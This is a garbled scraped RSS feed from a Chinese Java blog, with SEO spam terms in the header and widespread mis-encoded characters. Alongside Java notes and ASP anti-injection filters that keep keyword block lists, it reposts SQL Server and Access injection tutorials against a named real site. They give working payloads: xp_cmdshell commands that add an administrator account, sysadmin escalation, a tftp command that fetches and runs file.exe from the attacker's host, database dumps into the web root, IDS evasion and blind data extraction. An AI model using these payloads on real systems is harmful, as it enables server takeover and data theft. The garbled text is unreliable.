??xml version="1.0" encoding="utf-8" standalone="yes"?>亚洲第一街区偷拍街拍,国产亚洲人成网站在线观看,激情亚洲一区国产精品http://www.tkk7.com/lmsun/zh-cnWed, 14 May 2025 16:05:37 GMTWed, 14 May 2025 16:05:37 GMT60corejavaMW记http://www.tkk7.com/lmsun/archive/2006/06/23/54655.htmlmy javamy javaFri, 23 Jun 2006 05:25:00 GMThttp://www.tkk7.com/lmsun/archive/2006/06/23/54655.htmlhttp://www.tkk7.com/lmsun/comments/54655.htmlhttp://www.tkk7.com/lmsun/archive/2006/06/23/54655.html#Feedback3http://www.tkk7.com/lmsun/comments/commentRss/54655.htmlhttp://www.tkk7.com/lmsun/services/trackbacks/54655.html2.1安装java
1、java工具?a >http://java.sun.com/j2se/1.4/install-windows.html
2、设|执行环境(windows 2000)
PATH=c:\jdk\bin;
3、安装库源文件和文档
jar xvf src.jar
jar xvf j2sdkversion-doc.zip

W一个java例子
eg:Weclome.java

public class Welcome
{
public static void main(String[] args)
{
String[] greeting=new String[3];
greeting[0]="Welcome to Core Java";
greeting[1]="by Car Horstman";
greeting[2]="and Gary Cornell";
for ( int i=0;i<greeting.length;i++)
System.out.println(greeting[i]);
}
}



my java 2006-06-23 13:25 发表评论
]]>
jspsmartupload使用技?/title><link>http://www.tkk7.com/lmsun/archive/2006/06/23/54613.html</link><dc:creator>my java</dc:creator><author>my java</author><pubDate>Fri, 23 Jun 2006 01:34:00 GMT</pubDate><guid>http://www.tkk7.com/lmsun/archive/2006/06/23/54613.html</guid><wfw:comment>http://www.tkk7.com/lmsun/comments/54613.html</wfw:comment><comments>http://www.tkk7.com/lmsun/archive/2006/06/23/54613.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.tkk7.com/lmsun/comments/commentRss/54613.html</wfw:commentRss><trackback:ping>http://www.tkk7.com/lmsun/services/trackbacks/54613.html</trackback:ping><description><![CDATA[1、获得表单中文本框的数据Q?br />mySmartUpload.getRequest().getParameter("applyusrname")<br />java.util.Enumeration e = mySmartUpload.getRequest().getParameterNames();<img src ="http://www.tkk7.com/lmsun/aggbug/54613.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.tkk7.com/lmsun/" target="_blank">my java</a> 2006-06-23 09:34 <a href="http://www.tkk7.com/lmsun/archive/2006/06/23/54613.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>防SQL注入http://www.tkk7.com/lmsun/archive/2006/02/05/29575.htmlmy javamy javaSun, 05 Feb 2006 02:23:00 GMThttp://www.tkk7.com/lmsun/archive/2006/02/05/29575.htmlhttp://www.tkk7.com/lmsun/comments/29575.htmlhttp://www.tkk7.com/lmsun/archive/2006/02/05/29575.html#Feedback0http://www.tkk7.com/lmsun/comments/commentRss/29575.htmlhttp://www.tkk7.com/lmsun/services/trackbacks/29575.html<%
function sqlcheck(Str,errtype)
if Instr(LCase(Str),"select ") > 0 or Instr(LCase(Str),"insert ") > 0 or Instr(LCase(Str),"delete ") > 0 or Instr(LCase(Str),"delete from ") > 0 or Instr(LCase(Str),"count(") > 0 or Instr(LCase(Str),"drop table") > 0 or Instr(LCase(Str),"update ") > 0 or Instr(LCase(Str),"truncate ") > 0 or Instr(LCase(Str),"asc(") > 0 or Instr(LCase(Str),"mid(") > 0 or Instr(LCase(Str),"char(") > 0 or Instr(LCase(Str),"xp_cmdshell") > 0 or Instr(LCase(Str),"exec master") > 0 or Instr(LCase(Str),"net localgroup administrators") > 0  or Instr(LCase(Str),"and ") > 0 or Instr(LCase(Str),"net user") > 0 or Instr(LCase(Str),"or ") > 0 then
 Response.write("<script language=javascript>" & vbcrlf & "window.location.href ='ShowError.asp?errtype=" & errtype & "'" & vbcrlf & "</script>")
 Response.End
end if
Str=Replace(Str,"_","")     'qoSQL注入_
Str=Replace(Str,"*","")     'qoSQL注入*
Str=Replace(Str," ","")     'qoSQL注入I格
Str=Replace(Str,chr(34),"")   'qoSQL注入"
Str=Replace(Str,chr(39),"")            'qoSQL注入'
Str=Replace(Str,chr(91),"")            'qoSQL注入[
Str=Replace(Str,chr(93),"")            'qoSQL注入]
Str=Replace(Str,chr(37),"")            'qoSQL注入%
Str=Replace(Str,chr(58),"")            'qoSQL注入:
Str=Replace(Str,chr(59),"")            'qoSQL注入;
Str=Replace(Str,chr(43),"")            'qoSQL注入+
Str=Replace(Str,"{","")            'qoSQL注入{
Str=Replace(Str,"}","")            'qoSQL注入}
sqlcheck=Str            'q回l过上面字符替换后的Str
end function
%>


function SafeRequest(ParaName,ParaType)
'--- 传入参数 ---
'ParaName:参数名称-字符?
'ParaType:参数cd-数字?1表示以上参数是数字,0表示以上参数为字W?

Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "参数" & ParaName & "必须为数字型Q?
Response.end
End if
Else
ParaValue=replace(ParaValue,"'","''")
End if
SafeRequest=ParaValue
End function


Function SafeRequest(ParaValue,ParaType)
       '--- 传入参数 ---
       'ParaName:参数名称-字符?BR>       'ParaType:参数cd-数字?1表示以上参数是数字,0表示以上参数为字W?

       'Dim ParaValue
       'ParaValue=Request(ParaName)函数里面是不要加引号
       If ParaType=1 then
              If not isNumeric(ParaValue) then
                   Response.write " 参数" & ParaName & "必须为数字型Q?
                     Response.end
              End if
       Else
              ParaValue=replace(ParaValue,"'","")
     ParaValue=replace(ParaValue,";and 1=1","")
     ParaValue=replace(ParaValue,";and 1=2","")
     ParaValue=replace(ParaValue,";and user>0","")
     ParaValue=replace(ParaValue,">","")
     ParaValue=replace(ParaValue,"<","")
     ParaValue=replace(ParaValue,"=","")
     ParaValue=replace(ParaValue,"count","")
     ParaValue=replace(ParaValue,"select","")
     ParaValue=replace(ParaValue,"drop","")
     ParaValue=replace(ParaValue,"delect","")
     ParaValue=replace(ParaValue,"insert","")
     ParaValue=replace(ParaValue,"execute","")
     ParaValue=replace(ParaValue,"update","")    
     ParaValue=replace(ParaValue,"mid","")
     ParaValue=replace(ParaValue,"exec","")
     ParaValue=replace(ParaValue,"master","")
     ParaValue=replace(ParaValue,"char","")
     ParaValue=replace(ParaValue,"declare","")
     ParaValue=replace(ParaValue,"*","")
     ParaValue=replace(ParaValue,"%","")
     ParaValue=replace(ParaValue,"chr","")
     ParaValue=replace(ParaValue,"truncate","")
       End if
       SafeRequest=ParaValue
End function
'调用方式
DirID=Request("DirID")'///数据目录名称参数/无则表示全部数据
DirID=SafeRequest(DirID,1)


Dim SQL_inbreakstr
SQL_inbreakstr = "'|or|and|exec|insert|select|delete|update|drop|count|*|%|chr|mid|master|truncate|char|declare"
SQL_inbreak = split(SQL_inbreakstr,"|")
R_Q=Request.QueryString
R_F=Request.Form
IF R_Q<>"" THEN
 For i=0 To Ubound(SQL_inbreak)
  IF instr(R_Q,SQL_inbreak(i))>0 THEN
   Response.Write "*****"
                           Response.End
  END IF
 Next
End IF

IF R_F<>"" THEN
 For i=0 To Ubound(SQL_inbreak)
  IF instr(R_F,SQL_inbreak(i))>0 THEN
   Response.Write "*****"
                           Response.End
  END IF
 Next
END IF


<%
'--------版权说明------------------
'SQL通用防注入程?V2.0 完美?BR>'本程序由 火狐-枫知U?独立开?BR>'ҎE序有Q何疑问请联系本h
'QQ:613548

'--------定义部䆾------------------
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr
'自定义需要过滤的字串,?"? 分隔
Fy_In = "'?枫and枫exec枫insert枫select枫delete枫update枫count??枫chr枫mid枫master枫truncate枫char枫declare"
'----------------------------------
%>

<%
Fy_Inf = split(Fy_In,"?)
'--------POST部䆾------------------
If Request.Form<>"" Then
For Each Fy_Post In Request.Form

For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
'--------写入数据?------?-------
Fy_dbstr="DBQ="+server.mappath("SqlIn.mdb")+";DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};"
Set Fy_db=Server.CreateObject("ADODB.CONNECTION")
Fy_db.open Fy_dbstr
Fy_db.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','POST','"&Fy_Post&"','"&replace(Request.Form(Fy_Post),"'","''")&"')")
Fy_db.close
Set Fy_db = Nothing
'--------写入数据?------?-------

Response.Write "<Script Language=JavaScript>alert('枫网SQL通用防注入系l提C↓\n\n请不要在参数中包含非法字W尝试注入!\n\nHTTP://WwW.WrSkY.CoM  pȝ版本:V2.0(ASP)完美?);</Script>"
Response.Write "非法操作Q系l做了如下记录↓<br>"
Response.Write "操作QPQ?&Request.ServerVariables("REMOTE_ADDR")&"<br>"
Response.Write "操作旉Q?&Now&"<br>"
Response.Write "操作面Q?&Request.ServerVariables("URL")&"<br>"
Response.Write "提交方式QPQSQ?lt;br>"
Response.Write "提交参数Q?&Fy_Post&"<br>"
Response.Write "提交数据Q?&Request.Form(Fy_Post)
Response.End
End If
Next

Next
End If
'----------------------------------

'--------GET部䆾-------------------
If Request.QueryString<>"" Then
For Each Fy_Get In Request.QueryString

For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then
''--------写入数据?------?-------
Fy_dbstr="DBQ="+server.mappath("SqlIn.mdb")+";DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};"
Set Fy_db=Server.CreateObject("ADODB.CONNECTION")
Fy_db.open Fy_dbstr
Fy_db.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','GET','"&Fy_Get&"','"&replace(Request.QueryString(Fy_Get),"'","''")&"')")
Fy_db.close
Set Fy_db = Nothing
'--------写入数据?------?-------

Response.Write "<Script Language=JavaScript>alert('枫网SQL通用防注入系l提C↓\n\n请不要在参数中包含非法字W尝试注入!\n\nHTTP://WwW.WrSkY.CoM  pȝ版本:V2.0(ASP)完美?);</Script>"
Response.Write "非法操作Q系l做了如下记录↓<br>"
Response.Write "操作QPQ?&Request.ServerVariables("REMOTE_ADDR")&"<br>"
Response.Write "操作旉Q?&Now&"<br>"
Response.Write "操作面Q?&Request.ServerVariables("URL")&"<br>"
Response.Write "提交方式QGQT<br>"
Response.Write "提交参数Q?&Fy_Get&"<br>"
Response.Write "提交数据Q?&Request.QueryString(Fy_Get)
Response.End
End If
Next
Next
End If
'----------------------------------
%>

可以防止所有得sql注入Q?BR>Function SafeRequest(ParaName,ParaType)
 '--- 防止SQL注入 ---
 'ParaName:参数名称-字符?BR> 'ParaType:参数cd-数字?1表示以上参数是数字,0表示以上参数为字W?
 Dim ParaValue
 ParaValue=Request(ParaName)
 If ParaType=1 then
  If not isNumeric(ParaValue) then
   Response.write "<br><br><br><center><font color=red>参数" & ParaName & "必须为数字型Q?
   Response.end
  End if
 Else
  ParaValue=replace(ParaValue,"'","''")
 End if
 SafeRequest=ParaValue
End function
来源Q?A >http://www.yesky.com/305/1899305.shtml



my java 2006-02-05 10:23 发表评论
]]>
桂林老兵的SQLSERVER高注入技?转帖)http://www.tkk7.com/lmsun/archive/2006/02/05/29571.htmlmy javamy javaSun, 05 Feb 2006 02:04:00 GMThttp://www.tkk7.com/lmsun/archive/2006/02/05/29571.htmlhttp://www.tkk7.com/lmsun/comments/29571.htmlhttp://www.tkk7.com/lmsun/archive/2006/02/05/29571.html#Feedback0http://www.tkk7.com/lmsun/comments/commentRss/29571.htmlhttp://www.tkk7.com/lmsun/services/trackbacks/29571.html

[获得数据表名][字D值更Cؓ表名Q再xdq个字段的值就可得到表名]
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>'你得到的表名' 查出一个加一个]) [ where 条g]


[获得数据表字D名][字D值更Cؓ字段名,再想法读个字D늚值就可得到字D名]
update 表名 set 字段=(select top 1 col_name(object_id('要查询的数据表名'),字段列如:1) [ where 条g]


也可以这hL获取表名Q?/P>


select top 1 name from sysobjects where xtype=u and status>0 and name not in('table1','table2',?

通过SQLSERVER注入漏洞建数据库理员帐号和pȝ理员帐号[当前帐号必须是SYSADMINl]


news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- //d数据库用L户test,密码为test
news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- //如果x密码Q则用这句(test的密码改?23456Q?BR>news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- //test加到sysadminl?q个l的成员可执行Q何操?BR>news.asp?id=2;exec master.dbo.xp_cmdshell 'net user test test /add';-- //dpȝ用户test,密码为test
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';-- //系l用户test提升为管理员


q样Q你在他的数据库和系l内都留下了test理员̎号了

下面是如何从你的服器下蝲文gfile.exe后运行它[前提是你必须你的电脑设为TFTP服务器,?9端口打开]


id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP get file.exe';--


然后q行q个文gQ?BR>id=2; exec master.dbo.xp_cmdshell 'file.exe';--


下蝲服务器的文gfile2.doc到本地TFTP服务器[文g必须存在]:


id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP Put file2.doc';--


l过IDS的检[使用变量]
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm?’dshell' exec @a 'dir c:\'



my java 2006-02-05 10:04 发表评论
]]>
SQL注入天书http://www.tkk7.com/lmsun/archive/2006/02/05/29570.htmlmy javamy javaSun, 05 Feb 2006 01:58:00 GMThttp://www.tkk7.com/lmsun/archive/2006/02/05/29570.htmlhttp://www.tkk7.com/lmsun/comments/29570.htmlhttp://www.tkk7.com/lmsun/archive/2006/02/05/29570.html#Feedback0http://www.tkk7.com/lmsun/comments/commentRss/29570.htmlhttp://www.tkk7.com/lmsun/services/trackbacks/29570.html
QIQ注入是从正常的WWW端口讉KQ而且表面看v来跟一般的Web面讉K没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报Q如果管理员没查看IIS*志的习惯Q可能被入R很长旉都不会发觉?

但是QSQL注入的手法相当灵z,在注入的时候会到很多意外的情c能不能Ҏ具体情况q行分析Q构造y妙的SQL语句Q从而成功获取想要的数据Q是高手与“菜鸟”的Ҏ区别?

Ҏ国情Q国内的|站用ASP Access或SQLServer的占70%以上QPHP MySQ占L20%Q其他的不10%。在本文Q我们从分入门、进阶至高讲解一下ASP注入的方法及技巧,PHP注入的文章由NB联盟的另一位朋友zwell撰写Q希望对安全工作者和E序员都有用处。了解ASP注入的朋友也请不要蟩q入门篇Q因为部分hҎ入的基本判断Ҏq存在误区。大家准备好了吗QLet's Go...

???

如果你以前没试过QIQ注入的话,那么W一步先把IE菜单=>工具=>Internet选项=>高=>昄友好HTTP 错误信息前面的勾L。否则,不论服务器返回什么错误,IE都只昄为HTTP 500服务器错误,不能获得更多的提CZ息?

W一节、SQL注入原理

以下我们从一个网www.19cn.com开始(注:本文发表前已征得该站站长同意Q大部分都是真实数据Q?

在网站首上Q有名ؓ“IE不能打开新窗口的多种解决Ҏ”的链接Q地址为:http://www.19cn.com/showdetail.asp?id=49Q我们在q个地址后面加上单引号’,服务器会q回下面的错误提C:

Microsoft JET Database Engine 错误 '80040e14'字符串的语法错误 在查询表辑ּ 'ID=49'' 中?

/showdetail.aspQ行8

从这个错误提C我们能看出下面几点Q?

1.|站使用的是Access数据库,通过JET引擎q接数据库,而不是通过ODBC?

2. E序没有判断客户端提交的数据是否W合E序要求?

3. 该SQL语句所查询的表中有一名ؓID的字Dc?

从上面的例子我们可以知道QSQL注入的原理,是从客L提交Ҏ的代码,从而收集程序及服务器的信息Q从而获取你惛_得到的资料?

W二节、判断能否进行SQL注入

看完W一节,有一些h会觉得:我也是经常这h试能否注入的Q这不是很简单吗Q?

其实Q这q不是最好的ҎQؓ什么呢Q?
首先Q不一定每台服务器的IIS都返回具体错误提C给客户端,如果E序中加了cint(参数)之类语句的话QSQL注入是不会成功的Q但服务器同样会报错Q具体提CZ息ؓ处理 URL 时服务器上出错。请和系l管理员联络?

其次Q部分对QIQ注入有一点了解的E序员,认ؓ只要把单引号qo掉就安全了,q种情况不ؓ数Q如果你用单引号试Q是不到注入点的那么,什么样的测试方法才是比较准呢Q答案如下:

?http://www.19cn.com/showdetail.asp?id=49

?http://www.19cn.com/showdetail.asp?id=49 ;;and 1=1

?http://www.19cn.com/showdetail.asp?id=49 ;;and 1=2

q就是经典的1=1?=2试法了Q怎么判断呢?看看上面三个|址q回的结果就知道了:

可以注入的表玎ͼ

?正常昄Q这是必然的Q不然就是程序有错误了)

?正常昄Q内容基本与①相?

?提示BOF或EOFQ程序没做Q何判断时Q、或提示找不到记录(判断了rs.eofӞ、或昄内容为空Q程序加了on error resume nextQ不可以注入比较容易判断了Q①同样正常昄Q②和③一般都会有E序定义的错误提C,或提C类型{换时出错?

  当然Q这只是传入参数是数字型的时候用的判断方法,实际应用的时候会有字W型和搜索型参数Q我在中񔽋的“SQL注入一般步骤”再做分析?

W三节、判断数据库cd及注入方?

不同的数据库的函数、注入方法都是有差异的,所以在注入之前Q我们还要判断一下数据库的类型。一般ASP最常搭配的数据库是Access和SQLServerQ网上超q?9%的网站都是其中之一?

怎么让程序告诉你它用的什么数据库呢?来看看:

SQLServer有一些系l变量,如果服务器IIS提示没关闭,q且SQLServerq回错误提示的话Q那可以直接从出错信息获取,Ҏ如下Q?

http://www.19cn.com/showdetail.asp?id=49;;and user>0

q句语句很简单,但却包含了SQLServerҎ注入Ҏ的精髓,我自׃是在一ơ无意的试中发现这U效率极高的猜解Ҏ。让我看来看看它的含义:首先Q前面的语句是正常的Q重点在anduser>0Q我们知道,user是SQLServer的一个内|变量,它的值是当前q接的用户名Q类型ؓnvarchar。拿一个nvarchar的Dint的数0比较Q系l会先试囑ְnvarchar的D{成int型,当然Q{的过E中肯定会出错,SQLServer的出错提C是Q将nvarchar?”abc?转换数据cd?int 的列时发生语法错误,呵呵Qabc正是变量user的|q样Q不废吹C力就拿到了数据库的用户名。在以后的篇q里Q大家会看到很多用这U方法的语句?

Z说几句,众所周知QSQLServer的用户sa是个{同Adminstrators权限的角Ԍ拿到了sa权限Q几乎肯定可以拿C机的Administrator了。上面的Ҏ可以很方便的试出是否是用sadQ要注意的是Q如果是sadQ提C是”dbo”{换成int的列发生错误Q而不是”sa”?

如果服务器IIS不允许返回错误提C,那怎么判断数据库类型呢Q我们可以从Access和SQLServer和区别入手,Access和SQLServer都有自己的系l表Q比如存放数据库中所有对象的表,Access是在pȝ表[msysobjects]中,但在Web环境下读该表会提C“没有权限”,SQLServer是在表[sysobjects]中,在Web环境?

可正常读取?

在确认可以注入的情况下,使用下面的语句:

http://www.19cn.com/showdetail.asp?id=49;;and(select count(*) from sysobjects)>0

http://www.19cn.com/showdetail.asp?id=49;;and(select count(*) from msysobjects)>0

如果数据库是SQLServerQ那么第一个网址的页面与原页?A target=_blank>http://www.19cn.com/showdetail.asp?id=49是大致相同的Q而第二个|址Q由于找不到表msysobjectsQ会提示出错Q就程序有定w处理Q页面也与原面完全不同?

如果数据库用的是AccessQ那么情况就有所不同Q第一个网址的页面与原页面完全不同;W二个网址Q则视乎数据库设|是否允许读该系l表Q一般来说是不允许的Q所以与原网址也是完全不同。大多数情况下,用第一个网址可以得知系l所用的数据库类型,W二个网址只作为开启IIS错误提示时的验证?

q???

在入门篇Q我们学会了QIQ注入的判断ҎQ但真正要拿到网站的保密内容Q是q远不够的。接下来Q我们就l箋学习如何从数据库中获取想要获得的内容Q首先,我们先看看SQL注入的一般步骤:

W一节、SQL注入的一般步?

首先Q判断环境,L注入点,判断数据库类型,q在入门已l讲q了?

其次Q根据注入参数类型,在脑中重构SQL语句的原貌,按参数类型主要分Z面三U:

(A) ID=49 q类注入的参数是数字型,SQL语句原貌大致如下Q?
Select * from 表名 where 字段=49
注入的参CؓID=49 And [查询条g]Q即是生成语句:
Select * from 表名 where 字段=49 And [查询条g]

(B) Class=q箋?q类注入的参数是字符型,SQL语句原貌大致概如下:
Select * from 表名 where 字段=’连l剧?
注入的参CؓClass=q箋剧?and [查询条g] and ‘??Q即是生成语句:
Select * from 表名 where 字段=’连l剧?and [查询条g] and ‘?’?

(C) 搜烦时没qo参数的,如keyword=关键字,SQL语句原貌大致如下Q?
Select * from 表名 where 字段like ?关键??
注入的参Cؓkeyword=?and [查询条g] and ??’, x生成语句Q?
Select * from 表名 where字段like ??and [查询条g] and ????

接着Q将查询条g替换成SQL语句Q猜解表名,例如Q?

ID=49 And (Select Count(*) from Admin)>=0

如果面׃ID=49的相同,说明附加条g成立Q即表Admin存在Q反之,即不存在Q请牢记q种ҎQ?

如此循环Q直至猜到表名ؓ止?

表名猜出来后Q将Count(*)替换成Count(字段?Q用同样的原理猜解字D名?

有h会说Q这里有一些偶然的成分Q如果表名v得很复杂没规律的Q那Ҏ没得玩下去了。说得很对,q世界根本就不存?00%成功的黑客技术,苍蝇不叮无缝的蛋Q无论多技术多高深的黑客,都是因ؓ别h的程序写得不严密或用者保密意识不够,才有得下手?

有点跑题了,话说回来Q对于SQLServer的库Q还是有办法让程序告诉我们表名及字段名的Q我们在高񔽋中会做介绍?

最后,在表名和列名猜解成功后,再用SQL语句Q得出字D늚|下面介绍一U最常用的方法-Ascii逐字解码法,虽然q种Ҏ速度很慢Q但肯定是可行的Ҏ?

我们举个例子Q已知表Admin中存在username字段Q首先,我们取第一条记录,试长度Q?

http://www.19cn.com/showdetail.asp?id=49;;and (select top 1 len(username) from Admin)>0

先说明原理:如果top 1的username长度大于0Q则条g成立Q接着是>1?gt;2?gt;3q样试下去Q一直到条g不成立ؓ止,比如>7成立Q?gt;8不成立,是len(username)=8

  当然没h会笨得从0,1,2,3一个个试Q怎么h比较快就看各自发挥了。在得到username的长度后Q用mid(username,N,1)截取WN位字W,再asc(mid(username,N,1))得到ASCII码,比如Q?

id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0

同样也是用逐步~小范围的方法得到第1位字W的ASCII码,注意的是英文和数字的ASCII码在1-128之间Q可以用折半法加速猜解,如果写成E序试Q效率会有极大的提高?

W二节、SQL注入常用函数

有SQL语言基础的hQ在QIQ注入的时候成功率比不熟悉的h高很多。我们有必要提高一下自qSQL水^Q特别是一些常用的函数及命令?

AccessQasc(字符) SQLServerQunicode(字符)

作用Q返回某字符的ASCII?

AccessQchr(数字) SQLServerQnchar(数字)

作用Q与asc相反Q根据ASCII码返回字W?

AccessQmid(字符?N,L) SQLServerQsubstring(字符?N,L)

作用Q返回字W串从N个字Wv长度为L的子字符Ԍ即N到N L之间的字W串

AccessQabc(数字) SQLServerQabc (数字)

作用Q返回数字的l对|在猜解汉字的时候会用到Q?

AccessQA between B And C SQLServerQA between B And C

作用Q判断A是否界于B与C之间

W三节、中文处理方?

在注入中到中文字符是常有的事,有些Z到中文字符想打退堂鼓了。其实只要对中文的编码有所了解Q“中文恐惧症”很快可以克服?

先说一点常识:

Access中,中文的ASCII码可能会出现负数Q取负数后用abs()取绝对|汉字字符不变?

SQLServer中,中文的ASCII为正敎ͼ但由于是UNICODE的双位编码,不能用函数ascii()取得ASCII码,必须用函数unicode ()q回unicode|再用nchar函数取得对应的中文字W?


了解了上面的两点后,是不是觉得中文猜解其实也跟英文差不多呢?除了使用的函数要注意、猜解范围大一点外Q方法是没什么两L?

?U??

看完入门和q阶后Q稍加练习,破解一般的|站是没问题了。但如果到表名列名猜不刎ͼ或程序作者过滤了一些特D字W,怎么提高注入的成功率Q怎么h高猜解效率?请大家接着往下看高񔽋?

W一节、利用系l表注入SQLServer数据?

SQLServer是一个功能强大的数据库系l,与操作系l也有紧密的联系Q这l开发者带来了很大的方便,但另一斚wQ也为注入者提供了一个蟩板,我们先来看看几个具体的例子:

?http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add?-

  分号;在SQLServer中表C隔开前后两句语句Q?-表示后面的语句ؓ注释Q所以,q句语句在SQLServer中将被分成两句执行,先是Select出ID=1的记录,然后执行存储q程xp_cmdshellQ这个存储过E用于调用系l命令,于是Q用net命o新徏了用户名为name、密码ؓpassword的windows的帐P接着Q?

?http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators/add?-

  新建的帐号name加入理员组Q不用两分钟Q你已经拿到了系l最高权限!当然Q这U方法只适用于用saq接数据库的情况Q否则,是没有权限调用xp_cmdshell的?

  ?http://Site/url.asp?id=1 ;;and db_name()>0

前面有个cM的例子and user>0Q作用是获取q接用户名,db_name()是另一个系l变量,q回的是q接的数据库名?

?http://Site/url.asp?id=1;backup database 数据库名 to disk=’c:\inetpub\wwwroot\1.db?--q是相当狠的一招,从③拿到的数据库名,加上某些IIS出错暴露出的l对路径Q将数据库备份到Web目录下面Q再用HTTP把整个数据库完完整整的下蝲回来Q所有的理员及用户密码都一览无遗!在不知道l对路径的时候,q可以备份到|络地址的方法(?A href="http://file:///202.96.xx.xxShare1.db" target=_blank>\\202.96.xx.xx\Share\1.dbQ,但成功率不高?

  ?http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’and status>0)>0

前面说过Qsysobjects是SQLServer的系l表Q存储着所有的表名、视图、约束及其它对象Qxtype=’U’and status>0Q表C用户徏立的表名Q上面的语句第一个表名取出,?比较大小Q让报错信息把表名暴露出来。第二、第三个表名怎么获取Q还是留l我们聪明的读者思考吧?

?http://Site/url.asp?id=1 ;;and (Select Top 1 col_name(object_id(‘表名?,1) from sysobjects)>0

从⑤拿到表名后,用object_id(‘表名?获取表名对应的内部IDQcol_name(表名ID,1)代表该表的第1个字D名Q将1换成2,3,4...可以逐个获取所猜解表里面的字段名?

  以上6Ҏ我研ISQLServer注入半年多以来的心血l晶Q可以看出,对SQLServer的了解程度,直接影响着成功率及猜解速度。在我研ISQLServer注入之后Q我在开发方面的水^也得到很大的提高Q呵呵,也许安全与开发本来就是相辅相成的吧?

W二节、绕q程序限制l注?

在入门篇提到Q有很多人喜Ƣ用’号试注入漏洞Q所以也有很多h用过滤’号的方法来“防止”注入漏z,q也许能挡住一些入门者的dQ但对SQL注入比较熟悉的hQ还是可以利用相关的函数Q达到绕q程序限制的目的?

在“SQL注入的一般步骤”一节中Q我所用的语句Q都是经q我优化Q让其不包含有单引号的;在“利用系l表注入SQLServer数据库”中Q有些语句包含有’号Q我们D个例子来看看怎么攚w这些语句:

单的如where xtype=’U’,字符U对应的ASCII码是85Q所以可以用where xtype=char(85)代替Q如果字W是中文的,比如where name=’用户’,可以用where name=nchar(29992) nchar(25143)代替?

W三节、经验小l?

1.有些ZqoSelect、Update、Deleteq些关键字,但偏偏忘记区分大写Q所以大家可以用selecTq样试一下?

2.在猜不到字段名时Q不妨看看网站上的登录表单,一般ؓ了方便v见,字段名都与表单的输入框取相同的名字?

3.特别注意Q地址栏的 号传入程序后解释为空|+解释?P%解释?P具体可以参考URLEncode的相关介l?

4.用GetҎ注入ӞIIS会记录你所有的提交字符Ԍ对PostҎ做则不记录,所以能用Post的网址量不用Get?

5. 猜解Access时只能用Ascii逐字解码法,SQLServer也可以用q种ҎQ只需要两者之间的区别卛_Q但是如果能用SQLServer的报错信息把值暴露出来,那效率和准确率会有极大的提高?

????

QIQ注入漏z可谓是“千里之堤,溃于蚁穴”,q种漏洞在网上极为普遍,通常是由于程序员Ҏ入不了解Q或者程序过滤不严格Q或者某个参数忘记检查导致。在q里Q我l大家一个函敎ͼ代替ASP中的Request函数Q可以对一切的SQL注入Say NOQ函数如下:

function SafeRequest(ParaName,ParaType)
'--- 传入参数 ---
'ParaName:参数名称-字符?
'ParaType:参数cd-数字?1表示以上参数是数字,0表示以上参数为字W?

Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "参数" & ParaName & "必须为数字型Q?
Response.end
End if
Else
ParaValue=replace(ParaValue,"'","''")
End if
SafeRequest=ParaValue
End function

文章到这里就l束了,不管你是安全人员、技术爱好者还是程序员Q我都希望本文能对你有所帮助?BR>

my java 2006-02-05 09:58 发表评论
]]>
UChttp://www.tkk7.com/lmsun/archive/2006/02/02/29464.htmlmy javamy javaThu, 02 Feb 2006 03:17:00 GMThttp://www.tkk7.com/lmsun/archive/2006/02/02/29464.htmlhttp://www.tkk7.com/lmsun/comments/29464.htmlhttp://www.tkk7.com/lmsun/archive/2006/02/02/29464.html#Feedback0http://www.tkk7.com/lmsun/comments/commentRss/29464.htmlhttp://www.tkk7.com/lmsun/services/trackbacks/29464.html
http://www.wsmmz.net

http://www.sooweb.net/Html/Soft/82.html

http://www.hnwuyun.com/jc/

http://club.cat898.com/newbbs/printpage.asp?BoardID=18&ID=760319

http://lsdw.go1.icpcn.com/pstg/6.htm

http://font.flash8.net/font/list.aspx?page=3&c_id=383&s_id=395

my java 2006-02-02 11:17 发表评论
]]>
电脑~程技巧与l护http://www.tkk7.com/lmsun/archive/2006/01/26/29231.htmlmy javamy javaThu, 26 Jan 2006 03:16:00 GMThttp://www.tkk7.com/lmsun/archive/2006/01/26/29231.htmlhttp://www.tkk7.com/lmsun/comments/29231.htmlhttp://www.tkk7.com/lmsun/archive/2006/01/26/29231.html#Feedback0http://www.tkk7.com/lmsun/comments/commentRss/29231.htmlhttp://www.tkk7.com/lmsun/services/trackbacks/29231.htmlhttp://www.comprg.com.cn



http://supercss.com/

my java 2006-01-26 11:16 发表评论
]]>
